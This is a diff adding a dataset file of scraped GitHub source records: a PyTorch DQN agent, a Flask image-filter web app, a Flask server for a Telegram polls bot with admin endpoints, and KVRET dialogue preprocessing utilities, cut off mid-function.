diff --git "a/5149.jsonl" "b/5149.jsonl" new file mode 100644--- /dev/null +++ "b/5149.jsonl" @@ -0,0 +1,2027 @@ +{"seq_id":"23711562511","text":"import numpy as np\nimport random\nimport torch\nfrom torch.nn import functional\nfrom torch import optim\nfrom collections import deque\n\nfrom model import QNetwork, DuelingQNetwork\n\n\nclass Agent(object):\n def __init__(self, state_size, action_size, mem_length=100000, ddqn=True):\n self.gamma = 0.99\n self.batch_size = 64\n self.action_size = action_size\n self.ddqn = ddqn\n\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n if ddqn:\n self.model = DuelingQNetwork(state_size, action_size).to(self.device)\n self.target_model = DuelingQNetwork(state_size, action_size).to(self.device)\n self.optimizer = optim.Adam(self.model.parameters(), lr=5e-4)\n self.experience = self.ddqn_experience\n else:\n self.model = QNetwork(state_size, action_size).to(self.device)\n self.optimizer = optim.Adam(self.model.parameters(), lr=5e-4)\n self.experience = self.dqn_experience\n\n # replay memory\n self.memory = deque(maxlen=mem_length) \n\n def act(self, state, eps=0):\n # epsilon greedy \n if random.random() < eps:\n return random.choice(np.arange(self.action_size))\n\n # state to predict action from\n state = torch.FloatTensor(state).unsqueeze(0).to(self.device)\n\n self.model.eval()\n with torch.no_grad():\n action_values = self.model(state)\n \n self.model.train()\n return np.argmax(action_values.cpu().data.numpy())\n \n def ddqn_experience(self, state, action, reward, next_state, done):\n self.memory.append((state, action, reward, next_state, done))\n if len(self.memory) < self.batch_size:\n return \n\n # get random batch\n states, actions, rewards, next_states, terminals = self.get_batch()\n\n # Get expected Q values from local model\n expected = self.model(states).gather(1, actions) \n Q = self.model(next_states).detach()\n\n # Get max predicted Q values (for next states) from target model\n targets_next = self.target_model(next_states).detach()\n targets_next = targets_next.gather(1, Q.max(1)[1].unsqueeze(1))\n\n # Compute Q targets for current states \n targets = rewards + (self.gamma * targets_next * (1 - terminals))\n \n # compute loss\n loss = functional.mse_loss(expected, targets)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n # update target network\n lr = 0.001\n for target_param, primary_param in zip(self.target_model.parameters(), self.model.parameters()):\n target_param.data.copy_(lr * primary_param.data + (1-lr) * target_param.data) \n\n def dqn_experience(self, state, action, reward, next_state, done):\n self.memory.append((state, action, reward, next_state, done))\n if len(self.memory) < self.batch_size:\n return \n\n # get random batch\n states, actions, rewards, next_states, terminals = self.get_batch()\n\n Q = self.model.forward(states)\n Q = Q.gather(1, actions).squeeze(1)\n next_Q = self.model.forward(next_states)\n max_next_Q = torch.max(next_Q, 1)[0]\n expected = rewards.squeeze(1) + self.gamma * max_next_Q\n\n # update model\n loss = functional.mse_loss(Q, expected)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n def get_batch(self):\n experiences = np.array(random.sample(self.memory, k=self.batch_size))\n experiences = [np.vstack(experiences[:, i]) for i in range(5)]\n\n # convert data to tensors\n states = torch.FloatTensor(experiences[0]).to(self.device)\n actions = torch.LongTensor(experiences[1]).to(self.device)\n rewards = 
torch.FloatTensor(experiences[2]).to(self.device)\n next_states = torch.FloatTensor(experiences[3]).to(self.device)\n terminals = torch.FloatTensor(experiences[4].astype(np.uint8)).to(self.device)\n\n return states, actions, rewards, next_states, terminals\n","repo_name":"SC4RECOIN/DQN","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"24877023958","text":"# Required modules\nfrom flask import Flask, request, render_template, send_from_directory\nfrom PIL import Image\nimport random\nimport requests\n\n# Web server application\napp = Flask(__name__)\n\n# Folder the images are served from\n# app.root_path gives the physical path of our application\ndossierImages = app.root_path + '/static/'\n\n# Load the Hermione image with PIL on the first call and check that it works\nhermione = Image.open(dossierImages + \"hermione.jpg\")\nprint(\"Image de l'Hermione chargée avec succès \", hermione.size)\n\n# Save the image into the only two files that are served and displayed on the web page\nhermione.save(dossierImages + \"originale.jpg\")\nhermione.save(dossierImages + \"traitement.jpg\")\n\n# Processing functions\nfrom traitements import *\n\n\n# random image\ndef image_web(largeur=400, hauteur=300):\n return Image.open(requests.get(f\"https://picsum.photos/{largeur}/{hauteur}\", stream = True).raw)\n\n# Home page, displays the images\n@app.route(\"/\" , methods=[\"GET\",\"POST\"])\ndef accueil():\n # choose the image depending on whether the checkbox is ticked or not\n if request.args.get(\"picsum\") == \"on\":\n originale = image_web()\n originale.save(dossierImages + \"originale.jpg\")\n else:\n originale = hermione\n originale.save(dossierImages + \"originale.jpg\")\n \n\n # client-uploaded image\n #if request.args.get(\"file\") != \"\":\n #file.save(os.path.join(app.config['UPLOAD_FOLDER'], file.filename))\n\n # the server operator sees which filter was requested\n print(request.args.get(\"filtre\"))\n\n # apply the processing\n traitee = originale.copy()\n traitee.save(dossierImages + \"traitement.jpg\")\n if request.args.get(\"filtre\") == \"please\":\n traitee = originale.copy()\n traitee.save(dossierImages + \"traitement.jpg\")\n if request.args.get(\"filtre\") == \"bruit\":\n traitee = bruit_30(traitee)\n traitee.save(dossierImages + \"traitement.jpg\")\n if request.args.get(\"filtre\") == \"symAxeVertical\":\n traitee = sym_axe_vertical(traitee)\n traitee.save(dossierImages + \"traitement.jpg\")\n if request.args.get(\"filtre\") == \"variation_s_g\":\n traitee = variation_s_g(traitee)\n traitee.save(dossierImages + \"traitement.jpg\")\n if request.args.get(\"filtre\") == \"filtreEmbossage\":\n traitee = filtreEmbossage(traitee)\n traitee.save(dossierImages + \"traitement.jpg\")\n if request.args.get(\"filtre\") == \"filtreContraste\":\n traitee = filtreContraste(traitee)\n traitee.save(dossierImages + \"traitement.jpg\")\n \n # return a random query-string value and the html page, with the images modified or not\n return render_template(\"index.html\" , hasard=random.randint(1,10000))\n\n\n\n\n# Access an image in the images folder\n@app.route('/static/<filename>')\ndef fichier(filename):\n return send_from_directory(dossierImages, filename, mimetype='image/jpeg')\n\n# Start the server listening on port 8080\napp.run(host='0.0.0.0', 
port=8080)","repo_name":"MJ240103/Traitement-Image-NSI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71887998820","text":"from flask import request, jsonify\nimport asyncio\nfrom configuration.config import server_port, local_host, super_admin_token\nfrom db_sqlalchemy.db_functions import *\n\n\nfrom exception_types import DBException\nfrom db_sqlalchemy.manytomany.db_server import myApp\n\nfrom aiogram import Bot, Dispatcher\nfrom flask_cors import cross_origin\n\nimport base64\n\n\n# init DB from scratch\ndef init_DB_from_scratch():\n drop_cascade_all()\n print('Init DB from scratch with super admin')\n insert_admin_and_token(super_admin_name, super_admin_password, super_admin_token)\n\ndef run_app():\n app_obj = myApp()\n app = app_obj.app\n connDBParams_obj = app_obj.connDBParams_obj\n bot = Bot(token=app_obj.MY_TOKEN)\n dp = Dispatcher(bot)\n DBErrorReply = \"DB_error_reply\"\n GeneralErrorReplay = \"general_error_reply\"\n\n init_DB_from_scratch()\n def decode_base64(message_bytes):\n message_bytes = base64.b64decode(message_bytes)\n translated_message = message_bytes.decode('utf-8')\n return translated_message\n def encode_base64(message):\n message_bytes = message.encode('utf-8')\n message_bytes = base64.b64encode(message_bytes)\n message_encrypt = message_bytes.decode('utf-8')\n return message_encrypt\n\n @app.route(\"/\")\n async def index():\n #return request.environ.get('SERVER_PROTOCOL')\n return \"PollsBot Server :)\" \\\n \"\\nSearch PollsBot channel on telegram\"\n\n ## ***********************************************users post ***********************************************\n @app.route('/register_user', methods=['POST'])\n def register_user():\n print('in register user post 1')\n try:\n data = request.get_json(force=True)\n print('in register user post 2')\n print(data)\n chat_id = data['chat_id']\n user_name = data['user_name']\n try:\n is_user = is_a_user(chat_id, user_name)\n if is_user:\n send_back = 'This device is already registered!'\n return jsonify(message_back=send_back)\n insert_user(chat_id, user_name)\n\n send_back = 'You have been registered'\n return jsonify(message_back=send_back)\n\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(message_back=send_back), 400\n\n except Exception as e:\n print(e)\n send_back = GeneralErrorReplay\n return jsonify(message_back=send_back), 500\n\n @app.route('/remove_user', methods=['POST'])\n def remove_user():\n try:\n data = request.get_json(force=True)\n chat_id = data['chat_id']\n user_name = data['user_name']\n print('request is ' + str(data))\n try:\n\n removed = delete_user(chat_id, user_name)\n if removed == 0:\n send_back = 'There isn\\'t a valid user with this name on this device to remove'\n return jsonify(message_back=send_back)\n\n send_back = 'You have been removed :('\n return jsonify(message_back=send_back)\n\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(message_back=send_back), 400\n\n except Exception as e:\n send_back = GeneralErrorReplay\n return jsonify(message_back=send_back), 500\n\n @app.route('/my_name_user', methods=['POST'])\n def my_name():\n try:\n data = request.get_json(force=True)\n chat_id = data['chat_id']\n try:\n\n user_name_exists, user_name = getUserName(chat_id)\n\n if user_name_exists:\n user_name_str = user_name\n send_back = f'User Name is {user_name_str}'\n return 
jsonify(message_back=send_back)\n else:\n send_back = 'This device isn\\'t registered!'\n return jsonify(message_back=send_back)\n\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(message_back=send_back), 400\n\n except Exception as e:\n send_back = GeneralErrorReplay\n return jsonify(message_back=send_back), 500\n\n @app.route('/user_answer', methods=['POST'])\n def user_answer():\n try:\n data = request.get_json(force=True)\n poll_id_telegram = data['poll_id_telegram']\n chat_id = data['chat_id']\n answer_number = data['answer_number']\n print('poll_id_telegram : ', poll_id_telegram)\n print('chat_id : ', chat_id)\n print('answer_number : ', str(answer_number))\n try:\n id_poll_exists, id_poll = getIdPollByPollIdTelegram(poll_id_telegram)\n print(id_poll_exists, id_poll)\n if id_poll_exists:\n insert_user_answer(chat_id, id_poll, answer_number)\n send_back = 'Answer has been received'\n return jsonify(message_back=send_back)\n else:\n send_back = 'something went wrong :('\n return jsonify(message_back=send_back), 401\n\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(message_back=send_back), 400\n\n except Exception as e:\n send_back = GeneralErrorReplay\n return jsonify(message_back=send_back), 500\n\n ## ***********************************************admin - super admin - post ***********************************************\n # not an UI request\n @app.route('/remove_admin', methods=['POST'])\n def remove_admin():\n try:\n data = request.get_json(force=True)\n admin_name = data['admin_name']\n password = decode_base64(data['password'])\n try:\n if admin_name == super_admin_name and password == super_admin_password:\n removed = delete_admin(admin_name, password)\n if removed == 0:\n send_back = 'There isn\\'t a valid admin with this name on this device to remove'\n return jsonify(message_back=send_back)\n\n send_back = 'Admin have been removed '\n return jsonify(message_back=send_back)\n else:\n send_back = 'You are not the super admin'\n return jsonify(error=send_back)\n\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(error=send_back), 400\n\n except Exception as e:\n send_back = GeneralErrorReplay\n return jsonify(error=send_back), 500\n ## ***********************************************admin post ***********************************************\n @app.route('/login_admin', methods=['POST'])\n @cross_origin()\n def login_admin():\n try:\n data = request.get_json(force=True)\n admin_name = data['admin_name']\n password = decode_base64(data['password'])\n try:\n token_exists, token_name = getTokenAndNameByAdminNamePasswordAndUpdate(admin_name, password)\n if token_exists:\n token = token_name[0]\n token = encode_base64(token)\n admin_name = encode_base64(token_name[1])\n response = jsonify(token=token, admin_name=admin_name)\n print('user logged in')\n return response\n else:\n send_back = \"admin not exists\"\n response = jsonify(error=send_back)\n return response\n except DBException as e:\n print(e)\n send_back = GeneralErrorReplay\n response = jsonify(error=send_back)\n return response\n except Exception as e:\n print(e)\n send_back = GeneralErrorReplay\n response = jsonify(error=send_back)\n # response.headers.add(\"Access-Control-Allow-Origin\", \"*\")\n return response\n\n @app.route('/logout_admin', methods=['POST'])\n @cross_origin()\n def logout_admin():\n try:\n data = request.get_json(force=True)\n token = decode_base64(data['token'])\n try:\n loged_out = 
logOutAndUpdateToken(token)\n if loged_out:\n response = jsonify(message_back=\"logged out\")\n print('user logged out')\n return response\n else:\n send_back = \"admin not exists\"\n response = jsonify(error=send_back)\n return response\n except DBException as e:\n print(e)\n send_back = GeneralErrorReplay\n response = jsonify(error=send_back)\n return response\n except Exception as e:\n print(e)\n send_back = GeneralErrorReplay\n response = jsonify(error=send_back)\n # response.headers.add(\"Access-Control-Allow-Origin\", \"*\")\n return response\n @app.route('/register_admin', methods=['POST'])\n @cross_origin()\n def register_admin():\n try:\n data = request.get_json(force=True)\n new_admin_name = data['admin_name']\n password = decode_base64(data['password'])\n token = decode_base64(data['token'])\n try:\n if is_a_admin_token(token):\n is_admin = is_a_admin(new_admin_name)\n if is_admin:\n send_back = \"Sorry, admin name already taken, try a different one\"\n response = jsonify(error=send_back)\n return response\n new_token = insert_admin(new_admin_name, password)\n if new_token is not None:\n send_back = new_token\n response = jsonify(token=send_back)\n return response\n else:\n send_back = \"You must be an admin to add admins\"\n response = jsonify(error=send_back)\n return response\n except DBException as e:\n print(e)\n send_back = \"Sorry, admin name already taken, try a different one\"\n response = jsonify(error=send_back)\n return response\n except Exception as e:\n print(e)\n send_back = GeneralErrorReplay\n response = jsonify(error=send_back)\n #response.headers.add(\"Access-Control-Allow-Origin\", \"*\")\n return response\n\n @app.route('/my_name_admin', methods=['POST'])\n def my_name_admin():\n try:\n data = request.get_json(force=True)\n token = decode_base64(data['token'])\n try:\n admin_name_exists, admin_name = getAdminNameByToken(token)\n\n if admin_name_exists:\n admin_name_str = admin_name\n send_back = admin_name_str\n return jsonify(message_back=send_back)\n else:\n send_back = 'This admin isn\\'t registered!'\n return jsonify(error=send_back)\n\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(error=send_back), 400\n\n except Exception as e:\n send_back = GeneralErrorReplay\n return jsonify(error=send_back), 500\n\n @app.route('/admins_name_list', methods=['POST'])\n @cross_origin()\n def admins_name_list():\n try:\n data = request.get_json(force=True)\n token = decode_base64(data['token'])\n try:\n if is_a_admin_token(token):\n admins_list_exists, admins_list = getAdminsList()\n if admins_list_exists:\n send_back = admins_list\n return jsonify(result_lst=send_back)\n else:\n send_back = 'This admin isn\\'t registered!'\n return jsonify(error=send_back)\n else:\n send_back = 'This admin isn\\'t registered!'\n return jsonify(error=send_back)\n\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(error=send_back), 400\n\n except Exception as e:\n send_back = GeneralErrorReplay\n return jsonify(error=send_back), 500\n\n ## ***********************************************poll - super admin - post ***********************************************\n @app.route('/remove_poll', methods=['POST'])\n def remove_poll():\n try:\n data = request.get_json(force=True)\n admin_name = data['admin_name']\n password = decode_base64(data['password'])\n id_poll = data['id_poll']\n try:\n if admin_name == super_admin_name and password == super_admin_password:\n removed = delete_poll(id_poll)\n if removed == 0:\n send_back = 
'There isn\\'t a valid admin_poll to remove'\n return jsonify(message_back=send_back)\n\n send_back = 'poll have been removed '\n return jsonify(message_back=send_back)\n else:\n send_back = 'You are not the super admin'\n return jsonify(error=send_back)\n\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(error=send_back), 400\n\n except Exception as e:\n send_back = GeneralErrorReplay\n return jsonify(error=send_back), 500\n\n ## ***********************************************poll post ***********************************************\n async def send_a_poll(users_chat_id_lst, poll_content, numbers_choices_dict):\n\n answers_lst = list(numbers_choices_dict.values())\n poll_id_telegram_lst = []\n # await dp.bot.send_message(1332261387, 'gfgfdgdf')\n for chat_id in users_chat_id_lst: # send poll to all requested users\n try:\n poll_sent = await dp.bot.send_poll(\n chat_id,\n poll_content,\n answers_lst,\n is_anonymous=False,\n allows_multiple_answers=False\n )\n poll_id_telegram = poll_sent[\"poll\"][\"id\"]\n poll_id_telegram_lst.append(poll_id_telegram)\n except Exception as e:\n print(f'user {chat_id} error:')\n print(e)\n return poll_id_telegram_lst\n\n async def send_a_poll_and_register_to_poll_telegram(id_poll, users_chat_id_lst, poll_content, numbers_choices_dict):\n poll_id_telegram_lst = await send_a_poll(users_chat_id_lst, poll_content, numbers_choices_dict)\n for poll_id_telegram in poll_id_telegram_lst:\n insert_poll_telegram(id_poll,\n poll_id_telegram) # token admin exists because registration poll is from the UI\n return True\n\n @app.route('/register_and_send_poll', methods=['POST'])\n @cross_origin()\n def register_and_send_poll():\n try:\n data = request.get_json(force=True)\n token = decode_base64(data['token'])\n poll_content = data['poll_content']\n numbers_choices_dict = transformNumberAnswerListToDict(data['numbers_choices_lst'])\n idPoll_answer_lst = data['idPoll_answer_lst']\n should_union = data['should_union']\n users_chat_id_lst= []\n\n try:\n if is_a_admin_token(token):\n is_idPoll_answer_lst_empty = len(idPoll_answer_lst) == 0 # or 'data' not in idPoll_answer_lst[0]\n if is_idPoll_answer_lst_empty or ('data' in idPoll_answer_lst[0] and idPoll_answer_lst[0]['data'] == \"\"):\n # no filtering\n users_chat_id_lst = getAllUsersChatIdsLst()\n print('This is full list ', users_chat_id_lst)\n else:\n # filter\n users_chat_id_lst = getChatIdLstToSend(idPoll_answer_lst, union=should_union)\n print('This is filter list ', users_chat_id_lst)\n if len(users_chat_id_lst) == 0:\n send_back = 'No users at the mailing list for the poll.\\n' \\\n 'Try other filtering or no filter at all'\n return jsonify(error=send_back)\n # register poll\n id_poll, poll_content = insert_poll(poll_content, numbers_choices_dict)\n insert_admin_poll(token, id_poll) # token admin exists because registration poll is from the UI\n send_back = 'poll have been registered'\n # send a poll\n asyncio.set_event_loop(asyncio.new_event_loop())\n loop = asyncio.get_event_loop()\n res_sending = loop.run_until_complete(send_a_poll_and_register_to_poll_telegram(id_poll, users_chat_id_lst,poll_content, numbers_choices_dict))\n if res_sending:\n send_back = 'Poll has been sent'\n return jsonify(message_back=send_back)\n else:\n send_back = \"Sorry, an error occurred, poll has\\'nt been sent to all users\"\n return jsonify(error=send_back)\n else:\n send_back = \"Sorry, an error occurred, poll has\\'nt been registered\"\n return jsonify(error=send_back)\n except ParsingException as 
e:\n print(e)\n send_back = \"Error while parsing your input at the server\"\n return jsonify(error=send_back), 400\n except UseException as e:\n print(e)\n send_back = \"Each answer of the poll must be unique!\"\n return jsonify(error=send_back)\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(error=send_back), 400\n\n except Exception as e:\n print(e)\n send_back = GeneralErrorReplay\n return jsonify(error=send_back), 500\n\n\n @app.route('/get_poll_details', methods=['POST'])\n @cross_origin()\n def get_poll_details():\n try:\n data = request.get_json(force=True)\n # token = data['token'] # no need to be admin for poll details\n id_poll = data['id_poll']\n try:\n poll_data_exists, poll_data_dict = getFullPollData(id_poll)\n\n if poll_data_exists:\n send_back = poll_data_dict\n return jsonify(message_back=send_back)\n else:\n send_back = 'This poll isn\\'t registered!'\n return jsonify(error=send_back)\n\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(error=send_back), 400\n\n except Exception as e:\n send_back = GeneralErrorReplay\n return jsonify(error=send_back), 500\n ## ***********************************************data polls and answers post ***********************************************\n @app.route('/get_poll_answers', methods=['POST'])\n @cross_origin()\n def get_poll_answers():\n try:\n data = request.get_json(force=True)\n token = decode_base64(data['token'])\n id_poll = data['id_poll']\n try:\n print(id_poll)\n answers_hist_exists, answers_hist_dict = creatHistogramForSpecificPoll(token, id_poll)\n print(answers_hist_exists, answers_hist_dict)\n\n if answers_hist_exists:\n\n send_back = answers_hist_dict\n return jsonify(message_back=send_back)\n else:\n send_back = 'This poll isn\\'t registered!'\n return jsonify(error=send_back)\n\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(error=send_back), 400\n\n except Exception as e:\n send_back = GeneralErrorReplay\n return jsonify(error=send_back), 500\n\n @app.route('/get_associated_polls', methods=['POST'])\n @cross_origin()\n def get_associated_polls():\n try:\n data = request.get_json(force=True)\n token = decode_base64(data['token'])\n try:\n if is_a_admin_token(token):\n associated_polls_exist, associated_polls = getAssociatesPollsToAdmin(token)\n print(associated_polls_exist, associated_polls)\n if associated_polls_exist:\n if len(associated_polls) == 0:\n send_back = \"You don't have polls yet\"\n return jsonify(error=send_back)\n else:\n send_back = associated_polls\n return jsonify(result_lst=send_back)\n\n else:\n # send_back = \"No polls to filter from\"\n # return jsonify(result_lst=send_back)\n #send_back = [{'poll_content': 'poll1?', 'date': '2022-01-13', 'numbers_answers_lst': ['choice0', 'choice1', 'choice2'], 'id_poll': 1}, {'poll_content': 'poll3?', 'date': '2022-01-13', 'numbers_answers_lst': ['choice0', 'choice1', 'choice2'], 'id_poll': 3}]\n send_back = []\n return jsonify(result_lst=send_back)\n else:\n send_back = \"You Are not An Admin\"\n return jsonify(error=send_back), 404\n\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(error=send_back), 400\n\n except Exception as e:\n send_back = GeneralErrorReplay\n return jsonify(error=send_back), 500\n\n app.run(host=local_host, port=server_port, threaded=True)\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n 
run_app()\n","repo_name":"nir6760/project_managingData","sub_path":"server/main_server.py","file_name":"main_server.py","file_ext":"py","file_size_in_byte":23016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41948966393","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/2/28 上午10:53\n# @Author : yizhen\n# @Site : \n# @File : datautils.py\n# @Software: PyCharm\n\n#! /usr/bin/python\n# -*- coding: utf-8 -*-\n__author__ = 'uniphix'\n# print ('****************************to be implemented********************************')\nimport json\nimport os\nimport codecs\nfrom collections import defaultdict\nimport copy\nfrom torch.autograd import Variable\nimport torch\nimport itertools\n\nuse_cuda = torch.cuda.is_available()\noov = 1\n\ndef preprocess(path):\n '''\n\n :param dialog:\n :return:\n '''\n with codecs.open(path, 'r', encoding='utf-8') as fo:\n dialogs = json.loads(fo.read())\n fo.close()\n\n knowledge_base = []\n poi_selected = []\n last_num = 0\n for idx,dialog in enumerate(dialogs):\n #if (1):\n kb_flag = True\n if (dialog['scenario']['task']['intent'] == 'navigate'):\n for dialogue in dialog['dialogue']:\n dialogue['data']['utterance'] = dialogue['data']['utterance'] + ' ' #fixme 怎么复制并且共享操作\n if len(dialogue['data']['utterance']) == 0:\n continue\n else:\n dialogue['data']['utterance'] = dialogue['data']['utterance'].lower()\n # if (dialogue['data']['utterance'][-1] == '.') or (dialogue['data']['utterance'][-1] == '?') or \\\n # (dialogue['data']['utterance'][-1] == '!') and (dialogue['data']['utterance'][-2] != ' '):\n # dialogue['data']['utterance'] = dialogue['data']['utterance'][:-1] + ' ' + dialogue['data']['utterance'][-1]\n # elif (dialogue['data']['utterance'][-1] != '.') or (dialogue['data']['utterance'][-1] != '?') \\\n # or (dialogue['data']['utterance'][-1] != '!'):\n # dialogue['data']['utterance'] += ' .'\n dialogue['data']['utterance'] = dialogue['data']['utterance'].replace('. ', ' . 
')\n dialogue['data']['utterance'] = dialogue['data']['utterance'].replace('?', ' ?')\n dialogue['data']['utterance'] = dialogue['data']['utterance'].replace('!', ' !')\n dialogue['data']['utterance'] = dialogue['data']['utterance'].replace(',', ' ,')\n if kb_flag == True:\n if 'slots' in dialogue['data']:\n if 'poi_type' in dialogue['data']['slots']:\n poi_selected.append(dialogue['data']['slots']['poi_type'].lower())\n kb_flag = False\n else:\n if 'slots' in dialogue['data']:\n if 'poi_type' in dialogue['data']['slots']:\n poi_selected[-1] = dialogue['data']['slots']['poi_type'].lower()\n # if (len(poi_selected)) == last_num:\n # print (dialogs[idx]);exit(0)\n # last_num = len(poi_selected)\n else:\n dialogs[idx] = None\n if (dialog['scenario']['task']['intent'] == 'navigate'):\n if (dialog['scenario']['kb']['items'] is not None):\n for item in dialog['scenario']['kb']['items']:\n for key in item:\n item[key] = item[key].lower()\n knowledge_base.append(dialog['scenario']['kb']['items'])\n else:\n pass\n dialogs_navi = []\n for item in dialogs:\n if item is not None:\n dialogs_navi.append(item)\n # print (poi_selected)\n # print (len(knowledge_base))\n # print (len(poi_selected));exit(0)\n return dialogs_navi, knowledge_base\n\n\ndef data_preprocess(path):\n '''\n 数据预处理: 把标点和词分开,没有标点的统一加上.\n :param path:\n :return:\n '''\n\n train_path = os.path.join(path, 'kvret_train_public.json')\n valid_path = os.path.join(path, 'kvret_dev_public.json')\n test_path = os.path.join(path, 'kvret_test_public.json')\n\n # train_path = os.path.join(path, 'test.json')\n # valid_path = os.path.join(path, 'test.json')\n # test_path = os.path.join(path, 'test.json')\n return preprocess(train_path), preprocess(valid_path), preprocess(test_path)\n\n\n\ndef key_extraction(train_dialogs, path):\n '''\n 提取keys, triples, entities, kb\n :param train_dialogs:\n :return:\n '''\n keys = set()\n value_to_abstract_keys = {}\n triples = defaultdict(lambda :defaultdict(int)) #双层dict #fixme\n knowledge_base = []\n with codecs.open(os.path.join(path, 'kvret_entities.json'), 'r', encoding='utf-8') as fo:\n entities = json.loads(fo.read())\n\n for dialog in train_dialogs:\n if dialog is not None:\n if (dialog['scenario']['kb']['items']) is not None:\n domin = dialog['scenario']['kb']['kb_title']\n primary_key = ''\n if (domin == 'location information'):\n primary_key = 'poi'\n elif (domin == \"weekly forecast\"):\n primary_key = 'location'\n elif (domin == \"calendar\"):\n primary_key = 'event'\n for item in dialog['scenario']['kb']['items']: # item是一个包含键值信息的dict\n subject = item[primary_key]\n for (relation, value) in item.items():\n value = value.lower()\n key = (subject, relation) = (subject.lower(), relation.lower())\n keys.add(key)\n triples[key][value] += 1\n value_to_abstract_keys[value] = \"<\" + '_'.join(key[0].split()) + \":\" + \"_\".join(key[1].split()) + '>' #fixme\n\n return keys, triples, entities, value_to_abstract_keys\n\n\ndef key_to_idx(lang, underlined_keys):\n '''\n\n :param lang:\n :param underlined_keys:\n :return:\n '''\n keys_idx = []\n for (key_0, key_1) in underlined_keys:\n (key_0_ul, key_1_ul) = ([lang.word2idx[key_0]],[lang.word2idx[key_1]])\n keys_idx.append((key_0_ul, key_1_ul))\n keys_idx = Variable(torch.LongTensor(keys_idx))\n keys_idx = keys_idx.cuda() if use_cuda else keys_idx\n return keys_idx\n\n\nclass Lang:\n def __init__(self):\n self.word2idx = {'pad':0, 'oov':1, '':2, '':3}\n self.idx2word = {}\n self.word_size = 4\n\n def add_word(self, word):\n '''\n add word to dict\n :param word:\n 
:return:\n '''\n if word not in self.word2idx:\n self.word2idx[word] = len(self.word2idx)\n self.word_size += 1\n\n def add_sentence(self, sentence):\n '''\n add sentence to dict\n :param sentence:\n :return:\n '''\n for word in sentence.strip().split():\n self.add_word(word)\n\n def get_idx_to_word(self):\n '''\n get idx_to_word\n :return:\n '''\n self.idx2word = {idx:word for word, idx in self.word2idx.items()}\n return self.idx2word\n\n def sentence_to_idx(self, sentence):\n '''\n '''\n return [self.word2idx.get(word, 1) for word in sentence.split()]\n\n\ndef generate_dict(keys, train_dialogs, lang, value_to_abstract_keys):\n '''\n 生成词典,先将key变成下划线形式加入词典,再将对话将入词典\n :param keys:\n :param train_dialogs:\n :param lang:\n :return:\n '''\n underlined_keys = []\n for key in keys:\n key_0 = '_'.join(key[0].split())\n key_1 = '_'.join(key[1].split())\n lang.add_word(key_0)\n lang.add_word(key_1)\n underlined_keys.append((key_0,key_1))\n\n for dialog in train_dialogs:\n if dialog is not None:\n for dialogue in dialog['dialogue']:\n lang.add_sentence(dialogue['data']['utterance'])\n\n for (value, key) in value_to_abstract_keys.items():\n lang.add_word(key)\n\n return lang, underlined_keys\n\ndef generate_dict_manual(lang, path):\n '''\n 将手动的数据加入字典中,原来已经加过了,但是这里手动改了数据,防止不必要的错误,这里进行加上。\n :param lang:\n :param path:\n :return:\n '''\n train_path = os.path.join(path,'train.txt')\n with codecs.open(train_path, 'r', encoding='utf-8') as fp:\n fp_content = fp.read().strip().split('\\n\\n')\n for dialog in fp_content:\n for sentence in dialog.strip().split('\\n'):\n lang.add_sentence(sentence)\n return lang\n\ndef normalize_key(sentence, keys):\n '''\n 把句子中出现的key替换成抽象的key\n :param sentence:\n :param keys:\n :return:\n '''\n sentence = copy.deepcopy(sentence)\n for key in keys:\n sentence = sentence.replace(key[0], '_'.join(key[0].split()))\n sentence = sentence.replace(key[1], '_'.join(key[1].split()))\n return sentence\n\n\ndef noralize_value(sentence, value_to_abstract_keys):\n '''\n 把句子中出现的value替换成对应的抽象的<:>\n :param sentence:\n :return:\n '''\n sentence = copy.deepcopy(sentence)\n for value in value_to_abstract_keys:\n sentence = sentence.replace(' ' + value, ' ' + value_to_abstract_keys[value]) # fixme\n return sentence\n\ndef generate_instances_manual(path, type, kb):\n '''\n generate instances\n 生成形如[((u1 s1 u2, s2),kb),...]的数据\n :param path: manual data path\n :param type: train、valid、test\n :return:\n '''\n data_path = os.path.join(path, type+'.txt')\n with codecs.open(data_path, 'r' ,encoding='utf-8') as fp:\n train_dialogs = fp.read().strip().split('\\n\\n')\n instances = []\n for num, dialog in enumerate(train_dialogs):\n if (dialog == None):\n continue\n else:\n dialog = dialog.strip().split('\\n')\n if len(dialog) % 2 != 0: # if illegal, drop it\n continue\n instance_2 = []\n if dialog is not None:\n flag = True\n for idx, dialogue in enumerate(dialog):\n if idx % 2 == 1:\n output_sentence = dialogue\n # instance_2.append(output_sentence)\n instance_1 = (input_sentence, output_sentence)\n instances.append((instance_1, kb_normalization(kb[num])))\n # instances.append((instance_1, copy.deepcopy(instance_2)))\n input_sentence += ' '\n elif idx % 2 == 0:\n input_sentence_2 = dialogue\n instance_2.append(input_sentence_2)\n if flag:\n input_sentence = ''\n flag = False\n pass\n else:\n input_sentence += ' '\n input_sentence += dialogue\n return instances\n\n\ndef kb_normalization(kb):\n '''\n 标准化kb的表示\n :param kb:\n :return:\n '''\n norm_kb = []\n for row in kb:\n norm_row = []\n poi = 
